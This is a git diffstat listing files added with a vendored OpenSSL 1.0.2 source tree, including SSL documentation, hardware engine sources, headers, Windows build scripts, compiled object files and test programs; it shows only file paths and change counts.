 .../doc/ssl/SSL_CTX_set_max_cert_list.pod     |    77 +
 .../doc/ssl/SSL_CTX_set_mode.pod              |   101 +
 .../doc/ssl/SSL_CTX_set_msg_callback.pod      |    99 +
 .../doc/ssl/SSL_CTX_set_options.pod           |   345 +
 .../ssl/SSL_CTX_set_psk_client_callback.pod   |    81 +
 .../doc/ssl/SSL_CTX_set_quiet_shutdown.pod    |    63 +
 .../ssl/SSL_CTX_set_session_cache_mode.pod    |   137 +
 .../ssl/SSL_CTX_set_session_id_context.pod    |    83 +
 .../doc/ssl/SSL_CTX_set_ssl_version.pod       |    61 +
 .../doc/ssl/SSL_CTX_set_timeout.pod           |    59 +
 .../ssl/SSL_CTX_set_tlsext_ticket_key_cb.pod  |   195 +
 .../doc/ssl/SSL_CTX_set_tmp_dh_callback.pod   |   169 +
 .../doc/ssl/SSL_CTX_set_tmp_rsa_callback.pod  |   159 +
 .../doc/ssl/SSL_CTX_set_verify.pod            |   294 +
 .../doc/ssl/SSL_CTX_use_certificate.pod       |   165 +
 .../doc/ssl/SSL_CTX_use_psk_identity_hint.pod |   106 +
 .../doc/ssl/SSL_CTX_use_serverinfo.pod        |    46 +
 .../doc/ssl/SSL_SESSION_free.pod              |    55 +
 .../doc/ssl/SSL_SESSION_get_ex_new_index.pod  |    61 +
 .../doc/ssl/SSL_SESSION_get_time.pod          |    64 +
 .../openssl-1.0.2/doc/ssl/SSL_accept.pod      |    73 +
 .../doc/ssl/SSL_alert_type_string.pod         |   233 +
 .../openssl-1.0.2/doc/ssl/SSL_clear.pod       |    75 +
 .../openssl-1.0.2/doc/ssl/SSL_connect.pod     |    73 +
 .../doc/ssl/SSL_do_handshake.pod              |    72 +
 .../openssl-1.0.2/doc/ssl/SSL_free.pod        |    44 +
 .../openssl-1.0.2/doc/ssl/SSL_get_SSL_CTX.pod |    26 +
 .../openssl-1.0.2/doc/ssl/SSL_get_ciphers.pod |    42 +
 .../doc/ssl/SSL_get_client_CA_list.pod        |    53 +
 .../doc/ssl/SSL_get_current_cipher.pod        |    43 +
 .../doc/ssl/SSL_get_default_timeout.pod       |    41 +
 .../openssl-1.0.2/doc/ssl/SSL_get_error.pod   |   114 +
 .../SSL_get_ex_data_X509_STORE_CTX_idx.pod    |    61 +
 .../doc/ssl/SSL_get_ex_new_index.pod          |    59 +
 .../openssl-1.0.2/doc/ssl/SSL_get_fd.pod      |    44 +
 .../doc/ssl/SSL_get_peer_cert_chain.pod       |    52 +
 .../doc/ssl/SSL_get_peer_certificate.pod      |    55 +
 .../doc/ssl/SSL_get_psk_identity.pod          |    63 +
 .../openssl-1.0.2/doc/ssl/SSL_get_rbio.pod    |    40 +
 .../openssl-1.0.2/doc/ssl/SSL_get_session.pod |    73 +
 .../doc/ssl/SSL_get_verify_result.pod         |    57 +
 .../openssl-1.0.2/doc/ssl/SSL_get_version.pod |    54 +
 .../doc/ssl/SSL_library_init.pod              |    57 +
 .../doc/ssl/SSL_load_client_CA_file.pod       |    62 +
 .../openssl-1.0.2/doc/ssl/SSL_new.pod         |    44 +
 .../openssl-1.0.2/doc/ssl/SSL_pending.pod     |    43 +
 .../openssl-1.0.2/doc/ssl/SSL_read.pod        |   124 +
 .../doc/ssl/SSL_rstate_string.pod             |    59 +
 .../doc/ssl/SSL_session_reused.pod            |    45 +
 .../openssl-1.0.2/doc/ssl/SSL_set_bio.pod     |    34 +
 .../doc/ssl/SSL_set_connect_state.pod         |    55 +
 .../openssl-1.0.2/doc/ssl/SSL_set_fd.pod      |    54 +
 .../openssl-1.0.2/doc/ssl/SSL_set_session.pod |    57 +
 .../doc/ssl/SSL_set_shutdown.pod              |    72 +
 .../doc/ssl/SSL_set_verify_result.pod         |    38 +
 .../openssl-1.0.2/doc/ssl/SSL_shutdown.pod    |   125 +
 .../doc/ssl/SSL_state_string.pod              |    45 +
 .../openssl-1.0.2/doc/ssl/SSL_want.pod        |    77 +
 .../openssl-1.0.2/doc/ssl/SSL_write.pod       |   109 +
 .../openssl-1.0.2/doc/ssl/d2i_SSL_SESSION.pod |    76 +
 .../openssl-1.0.2/doc/ssl/ssl.pod             |   762 ++
 .../openssl-1.0.2/doc/ssleay.txt              |  7030 ++++++++++
 .../openssl-1.0.2/doc/standards.txt           |   285 +
 .../openssl-1.0.2/e_os.h                      |   782 ++
 .../openssl-1.0.2/e_os2.h                     |   322 +
 .../openssl-1.0.2/engines/Makefile            |   335 +
 .../openssl-1.0.2/engines/Makefile.save       |   335 +
 .../openssl-1.0.2/engines/alpha.opt           |     1 +
 .../openssl-1.0.2/engines/axp.opt             |     1 +
 .../openssl-1.0.2/engines/capierr.bat         |     1 +
 .../openssl-1.0.2/engines/ccgost/Makefile     |   274 +
 .../engines/ccgost/Makefile.save              |   274 +
 .../openssl-1.0.2/engines/ccgost/README.gost  |   300 +
 .../openssl-1.0.2/engines/ccgost/e_gost_err.c |   220 +
 .../openssl-1.0.2/engines/ccgost/e_gost_err.h |   157 +
 .../engines/ccgost/e_gost_err.proto           |    61 +
 .../openssl-1.0.2/engines/ccgost/gost.ec      |     5 +
 .../openssl-1.0.2/engines/ccgost/gost2001.c   |   339 +
 .../engines/ccgost/gost2001_keyx.c            |   292 +
 .../engines/ccgost/gost2001_keyx.h            |    10 +
 .../openssl-1.0.2/engines/ccgost/gost89.c     |   576 +
 .../openssl-1.0.2/engines/ccgost/gost89.h     |    98 +
 .../engines/ccgost/gost94_keyx.c              |   278 +
 .../openssl-1.0.2/engines/ccgost/gost_ameth.c |   917 ++
 .../openssl-1.0.2/engines/ccgost/gost_asn1.c  |    56 +
 .../openssl-1.0.2/engines/ccgost/gost_crypt.c |   623 +
 .../openssl-1.0.2/engines/ccgost/gost_ctl.c   |    93 +
 .../openssl-1.0.2/engines/ccgost/gost_eng.c   |   277 +
 .../engines/ccgost/gost_keywrap.c             |   106 +
 .../engines/ccgost/gost_keywrap.h             |    56 +
 .../openssl-1.0.2/engines/ccgost/gost_lcl.h   |   229 +
 .../openssl-1.0.2/engines/ccgost/gost_md.c    |    76 +
 .../engines/ccgost/gost_params.c              |   207 +
 .../engines/ccgost/gost_params.h              |    34 +
 .../openssl-1.0.2/engines/ccgost/gost_pmeth.c |   621 +
 .../openssl-1.0.2/engines/ccgost/gost_sign.c  |   320 +
 .../openssl-1.0.2/engines/ccgost/gosthash.c   |   268 +
 .../openssl-1.0.2/engines/ccgost/gosthash.h   |    52 +
 .../openssl-1.0.2/engines/ccgost/gostsum.c    |   187 +
 .../openssl-1.0.2/engines/e_4758cca.c         |   952 ++
 .../openssl-1.0.2/engines/e_4758cca.ec        |     1 +
 .../openssl-1.0.2/engines/e_4758cca_err.c     |   153 +
 .../openssl-1.0.2/engines/e_4758cca_err.h     |    98 +
 .../openssl-1.0.2/engines/e_aep.c             |  1166 ++
 .../openssl-1.0.2/engines/e_aep.ec            |     1 +
 .../openssl-1.0.2/engines/e_aep_err.c         |   159 +
 .../openssl-1.0.2/engines/e_aep_err.h         |   106 +
 .../openssl-1.0.2/engines/e_atalla.c          |   626 +
 .../openssl-1.0.2/engines/e_atalla.ec         |     1 +
 .../openssl-1.0.2/engines/e_atalla_err.c      |   145 +
 .../openssl-1.0.2/engines/e_atalla_err.h      |    94 +
 .../openssl-1.0.2/engines/e_capi.c            |  1848 +++
 .../openssl-1.0.2/engines/e_capi.ec           |     1 +
 .../openssl-1.0.2/engines/e_capi_err.c        |   187 +
 .../openssl-1.0.2/engines/e_capi_err.h        |   129 +
 .../openssl-1.0.2/engines/e_chil.c            |  1339 ++
 .../openssl-1.0.2/engines/e_chil.ec           |     1 +
 .../openssl-1.0.2/engines/e_chil_err.c        |   157 +
 .../openssl-1.0.2/engines/e_chil_err.h        |   105 +
 .../openssl-1.0.2/engines/e_cswift.c          |  1103 ++
 .../openssl-1.0.2/engines/e_cswift.ec         |     1 +
 .../openssl-1.0.2/engines/e_cswift_err.c      |   150 +
 .../openssl-1.0.2/engines/e_cswift_err.h      |    99 +
 .../openssl-1.0.2/engines/e_gmp.c             |   492 +
 .../openssl-1.0.2/engines/e_gmp.ec            |     1 +
 .../openssl-1.0.2/engines/e_gmp_err.c         |   137 +
 .../openssl-1.0.2/engines/e_gmp_err.h         |    86 +
 .../openssl-1.0.2/engines/e_nuron.c           |   436 +
 .../openssl-1.0.2/engines/e_nuron.ec          |     1 +
 .../openssl-1.0.2/engines/e_nuron_err.c       |   142 +
 .../openssl-1.0.2/engines/e_nuron_err.h       |    91 +
 .../openssl-1.0.2/engines/e_padlock.c         |  1266 ++
 .../openssl-1.0.2/engines/e_padlock.ec        |     1 +
 .../openssl-1.0.2/engines/e_sureware.c        |  1096 ++
 .../openssl-1.0.2/engines/e_sureware.ec       |     1 +
 .../openssl-1.0.2/engines/e_sureware_err.c    |   154 +
 .../openssl-1.0.2/engines/e_sureware_err.h    |   104 +
 .../openssl-1.0.2/engines/e_ubsec.c           |  1085 ++
 .../openssl-1.0.2/engines/e_ubsec.ec          |     1 +
 .../openssl-1.0.2/engines/e_ubsec_err.c       |   154 +
 .../openssl-1.0.2/engines/e_ubsec_err.h       |   102 +
 .../openssl-1.0.2/engines/engine_vector.mar   |    24 +
 .../openssl-1.0.2/engines/ia64.opt            |     1 +
 .../openssl-1.0.2/engines/makeengines.com     |  1140 ++
 .../openssl-1.0.2/engines/vax.opt             |     9 +
 .../openssl-1.0.2/engines/vendor_defns/aep.h  |   235 +
 .../engines/vendor_defns/atalla.h             |    44 +
 .../engines/vendor_defns/cswift.h             |   235 +
 .../engines/vendor_defns/hw_4758_cca.h        |   150 +
 .../engines/vendor_defns/hw_ubsec.h           |   124 +
 .../engines/vendor_defns/hwcryptohook.h       |   502 +
 .../engines/vendor_defns/sureware.h           |   250 +
 .../openssl-1.0.2/include/openssl/aes.h       |     1 +
 .../openssl-1.0.2/include/openssl/asn1.h      |     1 +
 .../openssl-1.0.2/include/openssl/asn1_mac.h  |     1 +
 .../openssl-1.0.2/include/openssl/asn1t.h     |     1 +
 .../openssl-1.0.2/include/openssl/bio.h       |     1 +
 .../openssl-1.0.2/include/openssl/blowfish.h  |     1 +
 .../openssl-1.0.2/include/openssl/bn.h        |     1 +
 .../openssl-1.0.2/include/openssl/buffer.h    |     1 +
 .../openssl-1.0.2/include/openssl/camellia.h  |     1 +
 .../openssl-1.0.2/include/openssl/cast.h      |     1 +
 .../openssl-1.0.2/include/openssl/cmac.h      |     1 +
 .../openssl-1.0.2/include/openssl/cms.h       |     1 +
 .../openssl-1.0.2/include/openssl/comp.h      |     1 +
 .../openssl-1.0.2/include/openssl/conf.h      |     1 +
 .../openssl-1.0.2/include/openssl/conf_api.h  |     1 +
 .../openssl-1.0.2/include/openssl/crypto.h    |     1 +
 .../openssl-1.0.2/include/openssl/des.h       |     1 +
 .../openssl-1.0.2/include/openssl/des_old.h   |     1 +
 .../openssl-1.0.2/include/openssl/dh.h        |     1 +
 .../openssl-1.0.2/include/openssl/dsa.h       |     1 +
 .../openssl-1.0.2/include/openssl/dso.h       |     1 +
 .../openssl-1.0.2/include/openssl/dtls1.h     |     1 +
 .../openssl-1.0.2/include/openssl/e_os2.h     |     1 +
 .../openssl-1.0.2/include/openssl/ebcdic.h    |     1 +
 .../openssl-1.0.2/include/openssl/ec.h        |     1 +
 .../openssl-1.0.2/include/openssl/ecdh.h      |     1 +
 .../openssl-1.0.2/include/openssl/ecdsa.h     |     1 +
 .../openssl-1.0.2/include/openssl/engine.h    |     1 +
 .../openssl-1.0.2/include/openssl/err.h       |     1 +
 .../openssl-1.0.2/include/openssl/evp.h       |     1 +
 .../openssl-1.0.2/include/openssl/hmac.h      |     1 +
 .../openssl-1.0.2/include/openssl/idea.h      |     1 +
 .../openssl-1.0.2/include/openssl/krb5_asn.h  |     1 +
 .../openssl-1.0.2/include/openssl/kssl.h      |     1 +
 .../openssl-1.0.2/include/openssl/lhash.h     |     1 +
 .../openssl-1.0.2/include/openssl/md4.h       |     1 +
 .../openssl-1.0.2/include/openssl/md5.h       |     1 +
 .../openssl-1.0.2/include/openssl/mdc2.h      |     1 +
 .../openssl-1.0.2/include/openssl/modes.h     |     1 +
 .../openssl-1.0.2/include/openssl/obj_mac.h   |     1 +
 .../openssl-1.0.2/include/openssl/objects.h   |     1 +
 .../openssl-1.0.2/include/openssl/ocsp.h      |     1 +
 .../include/openssl/opensslconf.h             |     1 +
 .../openssl-1.0.2/include/openssl/opensslv.h  |     1 +
 .../openssl-1.0.2/include/openssl/ossl_typ.h  |     1 +
 .../openssl-1.0.2/include/openssl/pem.h       |     1 +
 .../openssl-1.0.2/include/openssl/pem2.h      |     1 +
 .../openssl-1.0.2/include/openssl/pkcs12.h    |     1 +
 .../openssl-1.0.2/include/openssl/pkcs7.h     |     1 +
 .../openssl-1.0.2/include/openssl/pqueue.h    |     1 +
 .../openssl-1.0.2/include/openssl/rand.h      |     1 +
 .../openssl-1.0.2/include/openssl/rc2.h       |     1 +
 .../openssl-1.0.2/include/openssl/rc4.h       |     1 +
 .../openssl-1.0.2/include/openssl/ripemd.h    |     1 +
 .../openssl-1.0.2/include/openssl/rsa.h       |     1 +
 .../openssl-1.0.2/include/openssl/safestack.h |     1 +
 .../openssl-1.0.2/include/openssl/seed.h      |     1 +
 .../openssl-1.0.2/include/openssl/sha.h       |     1 +
 .../openssl-1.0.2/include/openssl/srp.h       |     1 +
 .../openssl-1.0.2/include/openssl/srtp.h      |     1 +
 .../openssl-1.0.2/include/openssl/ssl.h       |     1 +
 .../openssl-1.0.2/include/openssl/ssl2.h      |     1 +
 .../openssl-1.0.2/include/openssl/ssl23.h     |     1 +
 .../openssl-1.0.2/include/openssl/ssl3.h      |     1 +
 .../openssl-1.0.2/include/openssl/stack.h     |     1 +
 .../openssl-1.0.2/include/openssl/symhacks.h  |     1 +
 .../openssl-1.0.2/include/openssl/tls1.h      |     1 +
 .../openssl-1.0.2/include/openssl/ts.h        |     1 +
 .../openssl-1.0.2/include/openssl/txt_db.h    |     1 +
 .../openssl-1.0.2/include/openssl/ui.h        |     1 +
 .../openssl-1.0.2/include/openssl/ui_compat.h |     1 +
 .../openssl-1.0.2/include/openssl/whrlpool.h  |     1 +
 .../openssl-1.0.2/include/openssl/x509.h      |     1 +
 .../openssl-1.0.2/include/openssl/x509_vfy.h  |     1 +
 .../openssl-1.0.2/include/openssl/x509v3.h    |     1 +
 .../openssl-1.0.2/install.com                 |   136 +
 .../openssl-1.0.2/libcrypto.a                 |   Bin 0 -> 3086838 bytes
 .../openssl-1.0.2/libssl.a                    |   Bin 0 -> 539090 bytes
 .../openssl-1.0.2/makevms.com                 |  1556 +++
 .../openssl-1.0.2/ms/.rnd                     |   Bin 0 -> 1024 bytes
 .../openssl-1.0.2/ms/32all.bat                |    20 +
 .../openssl-1.0.2/ms/README                   |    13 +
 .../openssl-1.0.2/ms/applink.c                |   129 +
 .../openssl-1.0.2/ms/bcb4.bat                 |     6 +
 .../openssl-1.0.2/ms/certCA.srl               |     1 +
 .../openssl-1.0.2/ms/certCA.ss                |    10 +
 .../openssl-1.0.2/ms/certU.ss                 |    10 +
 .../openssl-1.0.2/ms/cmp.pl                   |    47 +
 .../openssl-1.0.2/ms/do_ms.bat                |    11 +
 .../openssl-1.0.2/ms/do_nasm.bat              |     8 +
 .../openssl-1.0.2/ms/do_nt.bat                |     7 +
 .../openssl-1.0.2/ms/do_win64a.bat            |    19 +
 .../openssl-1.0.2/ms/do_win64i.bat            |     9 +
 .../openssl-1.0.2/ms/keyCA.ss                 |     9 +
 .../openssl-1.0.2/ms/keyU.ss                  |     9 +
 .../openssl-1.0.2/ms/mingw32.bat              |    90 +
 .../openssl-1.0.2/ms/mw.bat                   |    26 +
 .../openssl-1.0.2/ms/req2CA.ss                |    29 +
 .../openssl-1.0.2/ms/reqCA.ss                 |     8 +
 .../openssl-1.0.2/ms/reqU.ss                  |     8 +
 .../openssl-1.0.2/ms/speed32.bat              |    37 +
 .../openssl-1.0.2/ms/tenc.bat                 |    14 +
 .../openssl-1.0.2/ms/tencce.bat               |    19 +
 .../openssl-1.0.2/ms/test.bat                 |   185 +
 .../openssl-1.0.2/ms/testce.bat               |   234 +
 .../openssl-1.0.2/ms/testce2.bat              |     2 +
 .../openssl-1.0.2/ms/testenc.bat              |    94 +
 .../openssl-1.0.2/ms/testencce.bat            |    97 +
 .../openssl-1.0.2/ms/testpem.bat              |    32 +
 .../openssl-1.0.2/ms/testpemce.bat            |    42 +
 .../openssl-1.0.2/ms/testss.bat               |    98 +
 .../openssl-1.0.2/ms/testssce.bat             |   104 +
 .../openssl-1.0.2/ms/tlhelp32.h               |   136 +
 .../openssl-1.0.2/ms/tpem.bat                 |     6 +
 .../openssl-1.0.2/ms/tpemce.bat               |     8 +
 .../openssl-1.0.2/ms/uplink-common.pl         |    22 +
 .../openssl-1.0.2/ms/uplink-ia64.pl           |    50 +
 .../openssl-1.0.2/ms/uplink-x86.pl            |    33 +
 .../openssl-1.0.2/ms/uplink-x86_64.pl         |    65 +
 .../openssl-1.0.2/ms/uplink.c                 |   126 +
 .../openssl-1.0.2/ms/uplink.h                 |    29 +
 .../openssl-1.0.2/ms/uplink.pl                |   204 +
 .../openssl-1.0.2/ms/x86asm.bat               |    57 +
 .../openssl-1.0.2/openssl.doxy                |     7 +
 .../openssl-1.0.2/openssl.spec                |   209 +
 .../openssl-1.0.2/os2/OS2-EMX.cmd             |   102 +
 .../openssl-1.0.2/os2/backwardify.pl          |    32 +
 .../openssl-1.0.2/shlib/Makefile.hpux10-cc    |    34 +
 .../openssl-1.0.2/shlib/README                |     1 +
 .../openssl-1.0.2/shlib/hpux10-cc.sh          |    92 +
 .../openssl-1.0.2/shlib/irix.sh               |     7 +
 .../openssl-1.0.2/shlib/sco5-shared-gcc.sh    |    48 +
 .../openssl-1.0.2/shlib/sco5-shared-installed |    28 +
 .../openssl-1.0.2/shlib/sco5-shared.sh        |    48 +
 .../openssl-1.0.2/shlib/solaris-sc4.sh        |    42 +
 .../openssl-1.0.2/shlib/solaris.sh            |    36 +
 .../openssl-1.0.2/shlib/sun.sh                |     8 +
 .../openssl-1.0.2/shlib/svr5-shared-gcc.sh    |    48 +
 .../openssl-1.0.2/shlib/svr5-shared-installed |    27 +
 .../openssl-1.0.2/shlib/svr5-shared.sh        |    48 +
 .../openssl-1.0.2/shlib/win32.bat             |    18 +
 .../openssl-1.0.2/shlib/win32dll.bat          |    13 +
 .../openssl-1.0.2/ssl/Makefile                |  1018 ++
 .../openssl-1.0.2/ssl/Makefile.bak            |  1018 ++
 .../openssl-1.0.2/ssl/Makefile.save           |  1018 ++
 .../openssl-1.0.2/ssl/bio_ssl.c               |   587 +
 .../openssl-1.0.2/ssl/bio_ssl.o               |   Bin 0 -> 10176 bytes
 .../openssl-1.0.2/ssl/d1_both.c               |  1523 +++
 .../openssl-1.0.2/ssl/d1_both.o               |   Bin 0 -> 17384 bytes
 .../openssl-1.0.2/ssl/d1_clnt.c               |   846 ++
 .../openssl-1.0.2/ssl/d1_clnt.o               |   Bin 0 -> 11712 bytes
 .../openssl-1.0.2/ssl/d1_lib.c                |   570 +
 .../openssl-1.0.2/ssl/d1_lib.o                |   Bin 0 -> 10416 bytes
 .../openssl-1.0.2/ssl/d1_meth.c               |    88 +
 .../openssl-1.0.2/ssl/d1_meth.o               |   Bin 0 -> 6112 bytes
 .../openssl-1.0.2/ssl/d1_pkt.c                |  1921 +++
 .../openssl-1.0.2/ssl/d1_pkt.o                |   Bin 0 -> 13936 bytes
 .../openssl-1.0.2/ssl/d1_srtp.c               |   448 +
 .../openssl-1.0.2/ssl/d1_srtp.o               |   Bin 0 -> 5000 bytes
 .../openssl-1.0.2/ssl/d1_srvr.c               |   956 ++
 .../openssl-1.0.2/ssl/d1_srvr.o               |   Bin 0 -> 12728 bytes
 .../openssl-1.0.2/ssl/dtls1.h                 |   271 +
 .../openssl-1.0.2/ssl/heartbeat_test.c        |   474 +
 .../openssl-1.0.2/ssl/install-ssl.com         |   136 +
 .../openssl-1.0.2/ssl/kssl.c                  |  2260 ++++
 .../openssl-1.0.2/ssl/kssl.h                  |   197 +
 .../openssl-1.0.2/ssl/kssl.o                  |   Bin 0 -> 1072 bytes
 .../openssl-1.0.2/ssl/kssl_lcl.h              |    88 +
 .../openssl-1.0.2/ssl/lib                     |     0
 .../openssl-1.0.2/ssl/s23_clnt.c              |   809 ++
 .../openssl-1.0.2/ssl/s23_clnt.o              |   Bin 0 -> 9384 bytes
 .../openssl-1.0.2/ssl/s23_lib.c               |   185 +
 .../openssl-1.0.2/ssl/s23_lib.o               |   Bin 0 -> 3552 bytes
 .../openssl-1.0.2/ssl/s23_meth.c              |    89 +
 .../openssl-1.0.2/ssl/s23_meth.o              |   Bin 0 -> 4016 bytes
 .../openssl-1.0.2/ssl/s23_pkt.c               |   113 +
 .../openssl-1.0.2/ssl/s23_pkt.o               |   Bin 0 -> 1912 bytes
 .../openssl-1.0.2/ssl/s23_srvr.c              |   652 +
 .../openssl-1.0.2/ssl/s23_srvr.o              |   Bin 0 -> 8280 bytes
 .../openssl-1.0.2/ssl/s2_clnt.c               |  1094 ++
 .../openssl-1.0.2/ssl/s2_clnt.o               |   Bin 0 -> 1080 bytes
 .../openssl-1.0.2/ssl/s2_enc.c                |   197 +
 .../openssl-1.0.2/ssl/s2_enc.o                |   Bin 0 -> 1080 bytes
 .../openssl-1.0.2/ssl/s2_lib.c                |   564 +
 .../openssl-1.0.2/ssl/s2_lib.o                |   Bin 0 -> 1080 bytes
 .../openssl-1.0.2/ssl/s2_meth.c               |    81 +
 .../openssl-1.0.2/ssl/s2_meth.o               |   Bin 0 -> 1080 bytes
 .../openssl-1.0.2/ssl/s2_pkt.c                |   711 +
 .../openssl-1.0.2/ssl/s2_pkt.o                |   Bin 0 -> 1080 bytes
 .../openssl-1.0.2/ssl/s2_srvr.c               |  1123 ++
 .../openssl-1.0.2/ssl/s2_srvr.o               |   Bin 0 -> 1080 bytes
 .../openssl-1.0.2/ssl/s3_both.c               |   747 ++
 .../openssl-1.0.2/ssl/s3_both.o               |   Bin 0 -> 8560 bytes
 .../openssl-1.0.2/ssl/s3_cbc.c                |   795 ++
 .../openssl-1.0.2/ssl/s3_cbc.o                |   Bin 0 -> 7968 bytes
 .../openssl-1.0.2/ssl/s3_clnt.c               |  3499 +++++
 .../openssl-1.0.2/ssl/s3_clnt.o               |   Bin 0 -> 31984 bytes
 .../openssl-1.0.2/ssl/s3_enc.c                |   951 ++
 .../openssl-1.0.2/ssl/s3_enc.o                |   Bin 0 -> 14744 bytes
 .../openssl-1.0.2/ssl/s3_lib.c                |  4493 +++++++
 .../openssl-1.0.2/ssl/s3_lib.o                |   Bin 0 -> 30696 bytes
 .../openssl-1.0.2/ssl/s3_meth.c               |    74 +
 .../openssl-1.0.2/ssl/s3_meth.o               |   Bin 0 -> 3824 bytes
 .../openssl-1.0.2/ssl/s3_pkt.c                |  1732 +++
 .../openssl-1.0.2/ssl/s3_pkt.o                |   Bin 0 -> 12568 bytes
 .../openssl-1.0.2/ssl/s3_srvr.c               |  3493 +++++
 .../openssl-1.0.2/ssl/s3_srvr.o               |   Bin 0 -> 31024 bytes
 .../openssl-1.0.2/ssl/srtp.h                  |   147 +
 .../openssl-1.0.2/ssl/ssl-lib.com             |  1229 ++
 .../openssl-1.0.2/ssl/ssl.h                   |  3159 +++++
 .../openssl-1.0.2/ssl/ssl2.h                  |   265 +
 .../openssl-1.0.2/ssl/ssl23.h                 |    84 +
 .../openssl-1.0.2/ssl/ssl3.h                  |   774 ++
 .../openssl-1.0.2/ssl/ssl_algs.c              |   155 +
 .../openssl-1.0.2/ssl/ssl_algs.o              |   Bin 0 -> 5392 bytes
 .../openssl-1.0.2/ssl/ssl_asn1.c              |   631 +
 .../openssl-1.0.2/ssl/ssl_asn1.o              |   Bin 0 -> 11296 bytes
 .../openssl-1.0.2/ssl/ssl_cert.c              |  1257 ++
 .../openssl-1.0.2/ssl/ssl_cert.o              |   Bin 0 -> 20000 bytes
 .../openssl-1.0.2/ssl/ssl_ciph.c              |  2067 +++
 .../openssl-1.0.2/ssl/ssl_ciph.o              |   Bin 0 -> 31328 bytes
 .../openssl-1.0.2/ssl/ssl_conf.c              |   668 +
 .../openssl-1.0.2/ssl/ssl_conf.o              |   Bin 0 -> 11616 bytes
 .../openssl-1.0.2/ssl/ssl_err.c               |   827 ++
 .../openssl-1.0.2/ssl/ssl_err.o               |   Bin 0 -> 1360 bytes
 .../openssl-1.0.2/ssl/ssl_err2.c              |    69 +
 .../openssl-1.0.2/ssl/ssl_err2.o              |   Bin 0 -> 1368 bytes
 .../openssl-1.0.2/ssl/ssl_lib.c               |  3534 +++++
 .../openssl-1.0.2/ssl/ssl_lib.o               |   Bin 0 -> 46616 bytes
 .../openssl-1.0.2/ssl/ssl_locl.h              |  1479 +++
 .../openssl-1.0.2/ssl/ssl_rsa.c               |  1008 ++
 .../openssl-1.0.2/ssl/ssl_rsa.o               |   Bin 0 -> 16560 bytes
 .../openssl-1.0.2/ssl/ssl_sess.c              |  1147 ++
 .../openssl-1.0.2/ssl/ssl_sess.o              |   Bin 0 -> 14816 bytes
 .../openssl-1.0.2/ssl/ssl_stat.c              |  1072 ++
 .../openssl-1.0.2/ssl/ssl_stat.o              |   Bin 0 -> 15472 bytes
 .../openssl-1.0.2/ssl/ssl_task.c              |   397 +
 .../openssl-1.0.2/ssl/ssl_txt.c               |   262 +
 .../openssl-1.0.2/ssl/ssl_txt.o               |   Bin 0 -> 5648 bytes
 .../openssl-1.0.2/ssl/ssl_utst.c              |    72 +
 .../openssl-1.0.2/ssl/ssl_utst.o              |   Bin 0 -> 1080 bytes
 .../openssl-1.0.2/ssl/ssltest.c               |  3017 +++++
 .../openssl-1.0.2/ssl/t1_clnt.c               |    90 +
 .../openssl-1.0.2/ssl/t1_clnt.o               |   Bin 0 -> 6216 bytes
 .../openssl-1.0.2/ssl/t1_enc.c                |  1337 ++
 .../openssl-1.0.2/ssl/t1_enc.o                |   Bin 0 -> 16592 bytes
 .../openssl-1.0.2/ssl/t1_ext.c                |   298 +
 .../openssl-1.0.2/ssl/t1_ext.o                |   Bin 0 -> 3992 bytes
 .../openssl-1.0.2/ssl/t1_lib.c                |  4356 +++++++
 .../openssl-1.0.2/ssl/t1_lib.o                |   Bin 0 -> 31496 bytes
 .../openssl-1.0.2/ssl/t1_meth.c               |    84 +
 .../openssl-1.0.2/ssl/t1_meth.o               |   Bin 0 -> 6152 bytes
 .../openssl-1.0.2/ssl/t1_reneg.c              |   292 +
 .../openssl-1.0.2/ssl/t1_reneg.o              |   Bin 0 -> 3480 bytes
 .../openssl-1.0.2/ssl/t1_srvr.c               |    92 +
 .../openssl-1.0.2/ssl/t1_srvr.o               |   Bin 0 -> 6216 bytes
 .../openssl-1.0.2/ssl/t1_trce.c               |  1266 ++
 .../openssl-1.0.2/ssl/t1_trce.o               |   Bin 0 -> 1080 bytes
 .../openssl-1.0.2/ssl/tls1.h                  |   813 ++
 .../openssl-1.0.2/ssl/tls_srp.c               |   541 +
 .../openssl-1.0.2/ssl/tls_srp.o               |   Bin 0 -> 1080 bytes
 .../openssl-1.0.2/test/CAss.cnf               |    76 +
 .../openssl-1.0.2/test/CAssdh.cnf             |    24 +
 .../openssl-1.0.2/test/CAssdsa.cnf            |    23 +
 .../openssl-1.0.2/test/CAssrsa.cnf            |    24 +
 .../openssl-1.0.2/test/CAtsa.cnf              |   163 +
 .../openssl-1.0.2/test/Makefile               |   764 ++
 .../openssl-1.0.2/test/Makefile.bak           |   764 ++
 .../openssl-1.0.2/test/Makefile.save          |   764 ++
 .../openssl-1.0.2/test/P1ss.cnf               |    37 +
 .../openssl-1.0.2/test/P2ss.cnf               |    45 +
 .../openssl-1.0.2/test/Sssdsa.cnf             |    27 +
 .../openssl-1.0.2/test/Sssrsa.cnf             |    26 +
 .../openssl-1.0.2/test/Uss.cnf                |    36 +
 .../openssl-1.0.2/test/VMSca-response.1       |     1 +
 .../openssl-1.0.2/test/VMSca-response.2       |     2 +
 .../openssl-1.0.2/test/asn1test.c             |    21 +
 .../openssl-1.0.2/test/bctest                 |   111 +
 .../openssl-1.0.2/test/bctest.com             |   152 +
 .../openssl-1.0.2/test/bftest.c               |     1 +
 .../openssl-1.0.2/test/bntest.c               |     1 +
 .../openssl-1.0.2/test/bntest.com             |    76 +
 .../openssl-1.0.2/test/casttest.c             |     1 +
 .../openssl-1.0.2/test/clean_test.com         |    35 +
 .../openssl-1.0.2/test/cms-examples.pl        |   409 +
 .../openssl-1.0.2/test/cms-test.pl            |   606 +
 .../openssl-1.0.2/test/constant_time_test.c   |     1 +
 .../openssl-1.0.2/test/destest.c              |     1 +
 .../openssl-1.0.2/test/dhtest.c               |     1 +
 .../openssl-1.0.2/test/dsatest.c              |     1 +
 .../openssl-1.0.2/test/dummytest.c            |    57 +
 .../openssl-1.0.2/test/ecdhtest.c             |     1 +
 .../openssl-1.0.2/test/ecdsatest.c            |     1 +
 .../openssl-1.0.2/test/ectest.c               |     1 +
 .../openssl-1.0.2/test/enginetest.c           |     1 +
 .../openssl-1.0.2/test/evp_test.c             |     1 +
 .../openssl-1.0.2/test/evptests.txt           |   401 +
 .../openssl-1.0.2/test/exptest.c              |     1 +
 .../openssl-1.0.2/test/heartbeat_test.c       |     1 +
 .../openssl-1.0.2/test/hmactest.c             |     1 +
 .../openssl-1.0.2/test/ideatest.c             |     1 +
 .../openssl-1.0.2/test/igetest.c              |   484 +
 .../openssl-1.0.2/test/jpaketest.c            |    57 +
 .../openssl-1.0.2/test/maketests.com          |  1092 ++
 .../openssl-1.0.2/test/md2test.c              |    57 +
 .../openssl-1.0.2/test/md4test.c              |     1 +
